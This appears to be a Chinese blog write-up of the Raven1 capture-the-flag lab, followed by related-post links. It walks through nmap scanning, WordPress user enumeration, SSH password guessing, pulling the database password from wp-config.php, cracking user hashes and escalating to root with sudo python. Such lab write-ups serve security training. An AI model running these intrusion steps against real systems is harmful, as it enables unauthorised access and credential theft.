Raven1渗透实战

目录:

1.wordpress爆破用户

2.wp-config得到数据库账号密码

3.ssh连接
4.pythn提权(sudo python -c 'import pty;pty.spawn("/bin/bash")')

主机发现与信息收集

arp-scan –l
 
主机发现
nmap -sS -A -p- 192.168.8.127 –n






 






nmap全端口扫




Web渗透实战


可以先修改一下hosts:


192.168.8.127 raven.local


进入web端,浓浓的wordpress风格


http://192.168.8.127/wordpress/


wordpress爆用户




小tips:http://192.168.8.127/wordpress/?author=n (n=1,2,3,4……)

http://192.168.8.127/wordpress/?author=1




出现用户: MICHAEL (michael)






 






wordpress




找到后台 http://raven.local/wordpress/wp-login.php (michael登录失败)


dir爆目录


出现几个可疑的目录:


http://192.168.8.127/vendor


http://192.168.8.127/wordpress/


继续爆这几个关键目录:






 






dir




看到pop3、phpmail和smtp就能想到应该和邮件有关的,应该是入口






 






dir2




在wordpress中罕见 http://192.168.8.127/service.html 并右键查看源代码


Get到第一个flag:


flag1{b9bbcb33e11b80be759c4e844862482d}






 






flag1




继续浏览爆出来的目录


http://192.168.8.127/vendor/PATH 暴露了系统路径,也许之后会用到


/var/www/html/vendor/






 






path




http://192.168.8.127/vendor/VERSION 暴露了版本信息  5.2.16






 






version




发现http://192.168.8.127/vendor/SECURITY.md   有提示






 






提示




从爆出来的这些目录来看,无疑是在提示从phpmailer入手


这时想到了goldeneye中的pop3服务


Nmap扫出来的端口中没有pop3和smtp服务


只能从22端口ssh入手了


ssh登录


尝试登录ssh,用户名就用wordpress暴露的用户  michael,密码尝试用 michael




ssh michael@192.168.8.127




登录成功,果然提示有邮件mail,然而并没有邮件提示







 






ssh





直接全局搜flag




find / -name "*flag*" 2>/dev/null








 






find flag






cat /var/www/flag2.txt








 






flag2




get第二个flag:


flag2{fc3fd58dcdad9ab23faca6e9a36e581c}


常规提权




netstat –a




发现主机开启的端口和服务







 






netstat -a





在靶机的3306端口开启了mysql服务


进入wordpress目录,查看conf配置文件,查看数据库密码




vi wp-config.php








 






wp-config







root / R@v3nSecurity




直接登录靶机的数据库




mysql -u root –p








 






mysql





进入wordpress数据中,发现wp_posts表,应该是post数据




select * from wp_posts;




发现了flag3和flag4:






 






flag3-4




flag3{afc01ab56b50591e7dccf93122770cd2}


flag4{715dea6c055b9fe3337544932f2941ce}


查看wordpress数据库中的users表






 






users







michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/




md5解看看






 






somd5




steven 的密码为 pink84


michael的解不出来


拿去登录一下ssh试试




ssh steven@192.168.8.127








 






ssh






sudo –l 




显示出当前用户的权限,发现可以运行python,直接python提权




sudo python -c 'import pty;pty.spawn("/bin/bash")'








 






python root





得到第四个flag:







 










												


											
Raven1渗透实战的更多相关文章
	

    
								
  1. 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
		
    /文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的  ...
    
		
    2. 
						
  2. 【渗透实战】那些奇葩的WAF_第二期_无意发现通杀漏洞,空字节突破上传!
		
    /文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334 未经许可,禁止转载/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何 ...
    
		
    3. 
						
  3. PowerUp攻击渗透实战
		
    记录下PowerUp在实战渗透中的利用 准备环境: kali linux 攻击机 已获得靶机meterpreter(非管理)权限 win7 靶机  拥有powershell环境 1)Invoke-Al ...
    
		
    4. 
						
  4. PowerSploit-CodeExecution(代码执行)脚本渗透实战
		
    首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. 项目地址:https://g ...
    
		
    5. 
						
  5. Burp Suite渗透实战操作指南-上篇
		
    Burp必备知识 在介绍功能之前有必要让大家了解一些burp的常用功能,以便在使用中更好的发挥麒麟臂的优势. 1.1  快捷键 很多人可能都没用过burp的快捷键吧,位置如下,不说话,如果不顺手可以自 ...
    
		
    6. 
						
  6. 【渗透实战】web渗透实战,手动拿学校站点 得到上万人的信息(漏洞已提交)
		
    ------------恢复内容开始------------ ’‘’版权tanee转发交流学校请备注漏洞已经提交学校管理员关键过程的截图和脚本代码已经略去.希望大家学习技术和思路就好,切勿进行违法犯罪 ...
    
		
    7. 
						
  7. DC-8靶机渗透实战
		
    前言: 本文将讲述通过信息收集,再web站点的sql注入漏洞加john爆破登录后台,然后找到远程代码执行漏洞getshell,最后用exim4命令提权漏洞进行权限提升拿到最终的flag. 0x00 环 ...
    
		
    8. 
						
  8. 【渗透实战】那些年我们遇到的奇葩WAF_第一期_请求方式绕过
		
    /文章作者:Kali_MG1937 CSDN博客:ALDYS4 QQ:3496925334/ 该博文为本人18年左右的渗透记录,文法粗糙,技术含量极低,流水账文章,且今日不知为何被顶上博客首页 为了避 ...
    
		
    9. 
						
  9. 【渗透实战】sqlmap_修改tamper脚本_绕过WAF_第三期
		
    /文章作者:Kali_MG1937 CSDN博客号:ALDYS4 QQ:3496925334/ 今天google找注入点的时候发现某企业一个挺有意思的waf 常规操作绕过去后决定写一篇博客 信息收集  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 过压保护IC和带LDO模式的Li+充电器前端保护IC
			
    PW2601是一种充电器前端集成电路,旨在为锂离子提供保护电池充电电路故障.该设备监测输入电压,电池电压以及充电电流,以确保所有三个参数都在正常范围内工作.这个该设备将关闭内部MOSFET断开,以保护 ...
    
			
    2. 
						
  2. jQ实现图片无缝轮播
			
    在铺页面的过程中,总是会遇到轮播图需要处理,一般我是会用swiper来制作,但总会有哪个几个个例需要我自己来写功能,这里制作了一个jq用来实现图片无缝轮播的dome,分享给大家ヽ( ̄▽ ̄)ノ. dom ...
    
			
    3. 
						
  3. 最佳的思维导图生成工具——markmap 使用教程
			
    前言 相信很多程序员朋友都有在用 Markdown 吧,我是大三找实习工作的时候接触到的,简历就是用 Markdown 写的. Markdown 的好处是专注码字的同时还能兼顾排版,不用像 word  ...
    
			
    4. 
						
  4. 使用注解的形式对token进行验证
			
    @[TOC](使用注解的形式对token进行验证)# 前言现在很多系统都是都用上了springboot.springcloud,系统也偏向分布式部署.管理,最早的用户令牌方案:session.cook ...
    
			
    5. 
						
  5. 【IDEA】Lombok--是否值得我们去使用
			
    官网 https://projectlombok.org/ 简介 Project Lombok is a java library that automatically plugs into your ...
    
			
    6. 
						
  6. Linux中LPC、RPC、IPC的区别
			
    其实这玩意儿就是纸老虎,将英文缩写翻译为中文就明白一半了. IPC:(Inter Process Communication )跨进程通信 这个概念泛指进程之间任何形式的通信行为,是个可以拿来到处套的 ...
    
			
    7. 
						
  7. calc, support, media各自的含义及用法?
			
    @support主要是用于检测浏览器是否支持CSS的某个属性,其实就是条件判断,如果支持某个属性,你可以写一套样式,如果不支持某个属性,你也可以提供另外一套样式作为替补. calc() 函数用于动态计 ...
    
			
    8. 
						
  8. Http系列:断点续传与多线程下载
			
    前言 当下载电影时,我常常会想中断下载后,为什么点击开始时会在中断的地方继续下载呢?又或者在看在线电影时,为什么可以按着播放条拖动就能看到想看的片段呢? http的range请求将解决以上困惑. 多线 ...
    
			
    9. 
						
  9. 如何将下载到本地的JAR包手动添加到Maven仓库,妈妈再也不用担心我下载不下来依赖啦
			
    我们有时候使用maven下载jar包的时候,可能maven配置都正确,但是部分jar包就是不能下载下来,如果maven设置都不正确的,可以查看我的maven系列文章,这里仅针对maven配置正确,但是 ...
    
			
    10. 
						
  10. springboot注解开发
			
    可以毫不夸张地说,这篇文章介绍的 Spring/SpringBoot 常用注解基本已经涵盖你工作中遇到的大部分常用的场景.对于每一个注解我都说了具体用法,掌握搞懂,使用 SpringBoot 来开发项 ...
    
			
    11.